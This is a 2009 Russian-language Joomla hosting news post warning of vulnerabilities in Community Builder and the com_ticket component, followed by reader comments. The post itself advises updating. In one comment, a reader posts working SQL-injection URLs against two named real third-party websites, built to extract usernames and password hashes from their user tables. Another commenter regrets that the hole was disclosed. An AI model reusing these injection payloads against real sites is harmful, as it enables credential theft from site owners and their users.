Специализированный хостинг для сайтов на Joomla
Уязвимости в CB 1.1 и com_ticket
24.06.2009 г.

На днях нашли критические уязвимости (через которые даже школьник может получить ваши хэши с паролями) в компоненте Community Builder до версии 1.1 и компоненте заказов билетов com_ticket до версии 2.1

Так что быстренько обновляем свои старые заброшенные сайты (CB 1.1 вышел около 2 лет назад, а com_ticket весьма редкое явление в рунете) и спокойно работаем дальше.  

Новость на официальном сайте CB :

http://www.joomlapolis.com/index.ph...ive&task=view&cid=11&itemid=68

Ссылка на уязвимость com_ticket

http://milw0rm.com/exploits/8999

 

Комментарии  

 
#1 Прохожий 2009-06-25 10:57
А откуда информация, что "даже школьник может"? Joomlapolis утверждает, что эксплойта в широком хождении среди киддисов нет, взлом был штучный (но дыра, тем не менее, есть).
Цитировать
 
 
#2 artur 2009-06-25 11:48
Смею предположить - хэш достаётся через SQL инъекцию …
80% взломов через компоненты джумлы происходит именно так
Цитировать
 
 
#3 DaveTMM 2009-06-25 19:34
могу даже показать как это делается
Демонстрация для версии 2.1

ht*p://www.helendaleeducat ionfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+ 1,2,3,4,5,concat(use rname,0x3a,password),7,8 ,9,10,11,12,13,14,15,16,17,18+from+jos_user s/*

Демонстрация для версии 0.1

ht*p://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+ 1,2,3,4,5,concat(use rname,0x3a,password),7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_us ers/*
Цитировать
 
 
#4 artur 2009-06-25 19:53
А у второго сайта PR5 между прочим )
А вообще всем советую иногда посещать милворм … http://milw0rm.com/
Полезно
Цитировать
 
 
#5 Прохожий 2009-06-26 02:17
Цитирую DaveTMM:
могу даже показать как это делается

Вопрос касался CB. Тоже можете показать?
Цитировать
 
 
+1 #6 Shado 2009-06-26 18:54
Жаль что спалили. удобная была дырка для работы с базой
Цитировать
 

Добавить комментарий

Защитный код
Обновить

JoomSuite Resource стал бесплатным   joomla 1.5.11 [Vea]

Поиск по шаблонам joomla

Производитель
Тематика
Joomla 1.5.*
Joomla 1.0.*

Лучший видеокурс 2011

Создание и Администрирование сайтов на Joomla 1.5

Онлайн-Магазин на Joomla

Создание Интернет-Магазина на Joomla 1.5 Под Ключ
сам продвигаю тут свои сайты. Работает !

Авторизация
Забыли пароль?

Шаблоны joomla от joomlart.com :

ja pyrite, ja olivine, ja nagya, ja mesolite, ja labra, ja kulanite, ja helio, ja galena, ja teline 2, ja fedora, ja edenite, ja dravity, ja corona, ja barite, ja avian 2, ja avian, ja drimia, ja rochea

от Templateplazza.com :

blogger plazza, webhost plazza, eshop plazza, magazine plazza, projecto plazza, property plazza, classifieds plazza, estore plazza , comuna2 plazza , times plazza , gaming plazza

Rockettheme.com :

replicant v2, metamorph, perihelion, TerranTribune, hyperion, catalyst, chromatophore, synapse, hiveMind, mediamogul, populus, dimensions

Шаблоны joomla от Yootheme :

yt pulse, yt shufle, yt Evolution, yt nu, yt ambient, yt mee, yt page, yt softech, yt ambient, yt rollout

Шаблоны joomla от Gavick.com :

aumi, gomuproject, musictop, eShoptrix 2, modish, the moment, cutting edge, the news, mox Movies, eshop, corporation

realty Rip you, jb fold, jb vision, jb clean commerce, jb habitat3, jb morgan, scroller 2, jb scroller, jb slider

jb medium, ja submit, бесплатные свадебные шаблоны